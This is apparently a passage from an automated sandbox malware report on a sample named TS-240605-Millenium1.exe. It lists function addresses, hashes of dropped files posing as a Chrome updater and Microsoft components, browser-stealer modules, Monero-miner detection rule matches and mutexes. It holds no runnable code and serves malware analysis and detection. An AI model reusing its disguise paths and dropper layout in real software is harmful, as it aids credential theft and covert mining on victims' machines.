Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00000235BB851F2C	7_2_00000235BB851F2C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00000235BB8638A8	7_2_00000235BB8638A8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00000235BB85D0E0	7_2_00000235BB85D0E0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00000235BB882B2C	7_2_00000235BB882B2C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00000235BB8944A8	7_2_00000235BB8944A8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00000235BB88DCE0	7_2_00000235BB88DCE0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00000235BB8B1F2C	7_2_00000235BB8B1F2C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00000235BB8C38A8	7_2_00000235BB8C38A8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00000235BB8BD0E0	7_2_00000235BB8BD0E0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD21000	7_2_00007FF7DFD21000
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD38670	7_2_00007FF7DFD38670
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD29D9B	7_2_00007FF7DFD29D9B
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD27B60	7_2_00007FF7DFD27B60
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD46B50	7_2_00007FF7DFD46B50
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD47A9C	7_2_00007FF7DFD47A9C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD32890	7_2_00007FF7DFD32890
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD32070	7_2_00007FF7DFD32070
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD3E80C	7_2_00007FF7DFD3E80C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD4A7D8	7_2_00007FF7DFD4A7D8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD38670	7_2_00007FF7DFD38670
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD2A76D	7_2_00007FF7DFD2A76D
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD29F3B	7_2_00007FF7DFD29F3B
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD36750	7_2_00007FF7DFD36750
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD41720	7_2_00007FF7DFD41720
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD44EFC	7_2_00007FF7DFD44EFC
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD38EF4	7_2_00007FF7DFD38EF4
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD426C4	7_2_00007FF7DFD426C4
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD33ED0	7_2_00007FF7DFD33ED0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD32684	7_2_00007FF7DFD32684
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD46DCC	7_2_00007FF7DFD46DCC
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD33540	7_2_00007FF7DFD33540
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD47550	7_2_00007FF7DFD47550
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD384BC	7_2_00007FF7DFD384BC
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD3ECA0	7_2_00007FF7DFD3ECA0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD32480	7_2_00007FF7DFD32480
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD3AC50	7_2_00007FF7DFD3AC50
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD3F320	7_2_00007FF7DFD3F320
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD292D0	7_2_00007FF7DFD292D0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD342D4	7_2_00007FF7DFD342D4
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD41720	7_2_00007FF7DFD41720
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD32A94	7_2_00007FF7DFD32A94
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD44A60	7_2_00007FF7DFD44A60
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD32274	7_2_00007FF7DFD32274
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001EB8871D0E0	8_2_000001EB8871D0E0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001EB887238A8	8_2_000001EB887238A8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001EB88711F2C	8_2_000001EB88711F2C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001EB88742B2C	8_2_000001EB88742B2C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001EB8874DCE0	8_2_000001EB8874DCE0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001EB887544A8	8_2_000001EB887544A8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001EB8877D0E0	8_2_000001EB8877D0E0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001EB887838A8	8_2_000001EB887838A8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001EB88771F2C	8_2_000001EB88771F2C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFAC2F160	8_2_00007FFDFAC2F160
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFAC81D20	8_2_00007FFDFAC81D20
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFAC79060	8_2_00007FFDFAC79060
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFACE4200	8_2_00007FFDFACE4200
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFACF7B50	8_2_00007FFDFACF7B50
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFAC86B40	8_2_00007FFDFAC86B40
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFACAEAE0	8_2_00007FFDFACAEAE0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFAC87B10	8_2_00007FFDFAC87B10
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFAD13AF0	8_2_00007FFDFAD13AF0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFAC79AB0	8_2_00007FFDFAC79AB0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFACA9BB0	8_2_00007FFDFACA9BB0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFAC69BA0	8_2_00007FFDFAC69BA0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFAC63BD0	8_2_00007FFDFAC63BD0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFAC6FBC0	8_2_00007FFDFAC6FBC0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFAC6A8A0	8_2_00007FFDFAC6A8A0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFAC8D8D0	8_2_00007FFDFAC8D8D0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFACC6A10	8_2_00007FFDFACC6A10
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFAC7C9A0	8_2_00007FFDFAC7C9A0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFACE9960	8_2_00007FFDFACE9960
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFAC7CF10	8_2_00007FFDFAC7CF10
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFACCBE70	8_2_00007FFDFACCBE70
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFACA4FE0	8_2_00007FFDFACA4FE0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFAC70FB0	8_2_00007FFDFAC70FB0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFACD2D1D	8_2_00007FFDFACD2D1D
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFAC6BCF0	8_2_00007FFDFAC6BCF0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFACD6CF0	8_2_00007FFDFACD6CF0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFACBDD10	8_2_00007FFDFACBDD10
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFACBAC60	8_2_00007FFDFACBAC60
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFACD1C60	8_2_00007FFDFACD1C60
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFAC8CE30	8_2_00007FFDFAC8CE30
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFAC8EDE0	8_2_00007FFDFAC8EDE0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFACBFE10	8_2_00007FFDFACBFE10
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFACFBDB0	8_2_00007FFDFACFBDB0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFAD22D60	8_2_00007FFDFAD22D60
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFAC672F1	8_2_00007FFDFAC672F1
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFACBC2F0	8_2_00007FFDFACBC2F0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFAD042A0	8_2_00007FFDFAD042A0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFAC632A5	8_2_00007FFDFAC632A5
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFACB6280	8_2_00007FFDFACB6280
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFAC73420	8_2_00007FFDFAC73420
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFACBB370	8_2_00007FFDFACBB370
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFAC72380	8_2_00007FFDFAC72380
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFACCB130	8_2_00007FFDFACCB130
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFAC7C0E0	8_2_00007FFDFAC7C0E0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFAC640E0	8_2_00007FFDFAC640E0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFAC910E0	8_2_00007FFDFAC910E0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFAC8E0B0	8_2_00007FFDFAC8E0B0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFACC2070	8_2_00007FFDFACC2070
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFAC84080	8_2_00007FFDFAC84080
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFACC4200	8_2_00007FFDFACC4200
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFACEB1A0	8_2_00007FFDFACEB1A0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFACEA170	8_2_00007FFDFACEA170
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFAC76720	8_2_00007FFDFAC76720
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFAC6283E	8_2_00007FFDFAC6283E
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFAC647E0	8_2_00007FFDFAC647E0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFAC64530	8_2_00007FFDFAC64530
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFACDC510	8_2_00007FFDFACDC510
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFAC89500	8_2_00007FFDFAC89500
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFAC9C4B9	8_2_00007FFDFAC9C4B9
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFAC694C0	8_2_00007FFDFAC694C0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFACA45D0	8_2_00007FFDFACA45D0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB3C2F20	8_2_00007FFDFB3C2F20
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB9B1890	8_2_00007FFDFB9B1890
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFE007A5770	8_2_00007FFE007A5770
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFE0076116D	8_2_00007FFE0076116D
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFE00761B54	8_2_00007FFE00761B54
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFE007983F0	8_2_00007FFE007983F0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFE007CC530	8_2_00007FFE007CC530
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFE00761A0F	8_2_00007FFE00761A0F
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFE00768630	8_2_00007FFE00768630
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFE007616FE	8_2_00007FFE007616FE
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFE007D26E0	8_2_00007FFE007D26E0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFE007617F8	8_2_00007FFE007617F8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFE0076143D	8_2_00007FFE0076143D
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFE007613DE	8_2_00007FFE007613DE
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFE007626FD	8_2_00007FFE007626FD
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFE00762612	8_2_00007FFE00762612
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFE00761618	8_2_00007FFE00761618
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFE0076117C	8_2_00007FFE0076117C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFE0076149C	8_2_00007FFE0076149C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFE007624D7	8_2_00007FFE007624D7
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFE00826D90	8_2_00007FFE00826D90
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFE007621C1	8_2_00007FFE007621C1
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFE00761C12	8_2_00007FFE00761C12
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFE007770B0	8_2_00007FFE007770B0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFE007AD2F0	8_2_00007FFE007AD2F0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFE0076155A	8_2_00007FFE0076155A
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFE007A9370	8_2_00007FFE007A9370
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFE00761FD7	8_2_00007FFE00761FD7

Source: Joe Sandbox View	Dropped File: C:\Program Files\Google\Chrome\updater.exe BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278
Source: Joe Sandbox View	Dropped File: C:\ProgramData\Microsoft\hacn.exe A7C3208CF3067D1DA12542CAB16516C9085620959DEB60DD000E190F15C74758
Source: Joe Sandbox View	Dropped File: C:\ProgramData\main.exe E3F5C557ECE7EC27CB7E4A26482EADF0D9065065D94B2919F9B881BC74800E6E
Source: Joe Sandbox View	Dropped File: C:\ProgramData\setup.exe BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278

Source: C:\ProgramData\Microsoft\based.exe	Code function: String function: 00007FFE007DC93D appears 50 times
Source: C:\ProgramData\Microsoft\based.exe	Code function: String function: 00007FF7DFD22B10 appears 47 times
Source: C:\ProgramData\Microsoft\based.exe	Code function: String function: 00007FFDFAC91940 appears 38 times
Source: C:\ProgramData\Microsoft\based.exe	Code function: String function: 00007FFE007DC181 appears 780 times
Source: C:\ProgramData\Microsoft\based.exe	Code function: String function: 00007FFE007DC16F appears 211 times
Source: C:\ProgramData\Microsoft\based.exe	Code function: String function: 00007FFE00761325 appears 309 times
Source: C:\ProgramData\Microsoft\based.exe	Code function: String function: 00007FFDFAC69330 appears 136 times
Source: C:\ProgramData\Microsoft\based.exe	Code function: String function: 00007FFDFAC6A4B0 appears 161 times
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: String function: 00007FF647772B30 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Code function: String function: 00381D60 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Code function: String function: 00381590 appears 57 times
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: String function: 00007FF6CEB22B10 appears 47 times

Source: unicodedata.pyd.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.6.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: rar.exe.7.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.7.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: _pytransform.dll.22.dr	Static PE information: Number of sections : 11 > 10
Source: setup.exe.12.dr	Static PE information: Number of sections : 11 > 10

Source: api-ms-win-core-processthreads-l1-1-1.dll.22.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.22.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.22.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.22.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.22.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.22.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.22.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.22.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.22.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.22.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.22.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.22.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.22.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.22.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.22.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.22.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.22.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.22.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.22.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.22.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.22.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.22.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.22.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.22.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.22.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.22.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.22.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.22.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.22.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.22.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.22.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.22.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.22.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.22.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.22.dr	Static PE information: No import functions for PE file found
Source: python3.dll.22.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.22.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.22.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.22.dr	Static PE information: No import functions for PE file found

Source: TS-240605-Millenium1.exe, 00000000.00000003.1829021959.000001C002F53000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs TS-240605-Millenium1.exe
Source: TS-240605-Millenium1.exe, 00000000.00000003.1833690751.000001C002F53000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs TS-240605-Millenium1.exe
Source: TS-240605-Millenium1.exe, 00000000.00000003.1830279591.000001C002F53000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs TS-240605-Millenium1.exe
Source: TS-240605-Millenium1.exe, 00000000.00000003.1829896804.000001C002F53000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_decimal.pyd. vs TS-240605-Millenium1.exe
Source: TS-240605-Millenium1.exe, 00000000.00000003.1833414858.000001C002F53000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs TS-240605-Millenium1.exe
Source: TS-240605-Millenium1.exe, 00000000.00000003.1830776920.000001C002F53000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs TS-240605-Millenium1.exe
Source: TS-240605-Millenium1.exe, 00000000.00000003.1829490121.000001C002F53000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs TS-240605-Millenium1.exe
Source: TS-240605-Millenium1.exe, 00000000.00000003.1830531474.000001C002F53000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs TS-240605-Millenium1.exe
Source: TS-240605-Millenium1.exe	Binary or memory string: OriginalFilename vs TS-240605-Millenium1.exe
Source: TS-240605-Millenium1.exe, 00000002.00000002.1861001417.00007FFDFB3C4000.00000004.00000001.01000000.00000005.sdmp	Binary or memory string: OriginalFilenamepython311.dll. vs TS-240605-Millenium1.exe
Source: TS-240605-Millenium1.exe, 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs TS-240605-Millenium1.exe

Source: C:\Windows\Temp\wxyubnjmnlae.tmp, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Windows\Temp\wxyubnjmnlae.tmp, type: DROPPED	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: C:\Windows\Temp\wxyubnjmnlae.tmp, type: DROPPED	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware

Source: python311.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9991822997667185
Source: libcrypto-3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.999059198943662
Source: unicodedata.pyd.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.994088121639785
Source: libcrypto-3.dll.7.dr	Static PE information: Section: UPX1 ZLIB complexity 0.999059198943662
Source: libssl-3.dll.7.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9916915494109948
Source: python311.dll.7.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9991822997667185
Source: sqlite3.dll.7.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9976578251008065
Source: unicodedata.pyd.7.dr	Static PE information: Section: UPX1 ZLIB complexity 0.994088121639785

Source: main.exe.12.dr, utils.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Update.exe.21.dr, utils.cs	Cryptographic APIs: 'CreateDecryptor'

Source: main.exe.12.dr, BrowserStealer.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Update.exe.21.dr, utils.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Update.exe.21.dr, utils.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: main.exe.12.dr, utils.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: main.exe.12.dr, utils.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Update.exe.21.dr, BrowserStealer.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp

Binary or memory string: .pptx.odt.csv.sql.mdb.sln.php

Source: classification engine

Classification label: mal100.troj.spyw.evad.mine.winEXE@132/153@5/4

Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe

Code function: 0_2_00007FF6CEB28770 GetLastError,FormatMessageW,WideCharToMultiByte,

0_2_00007FF6CEB28770

Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe

Code function: 5_2_0037C652 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

5_2_0037C652

Source: C:\ProgramData\setup.exe

File created: C:\Program Files\Google\Chrome\updater.exe

Source: C:\ProgramData\main.exe

File created: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog

Source: C:\ProgramData\Microsoft\based.exe	Mutant created: \Sessions\1\BaseNamedObjects\H
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:732:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:8148:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3608:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7704:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
Source: C:\ProgramData\main.exe	Mutant created: \Sessions\1\BaseNamedObjects\CosturaA54E036D2DCD19384E8EA53862E0DD8F
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
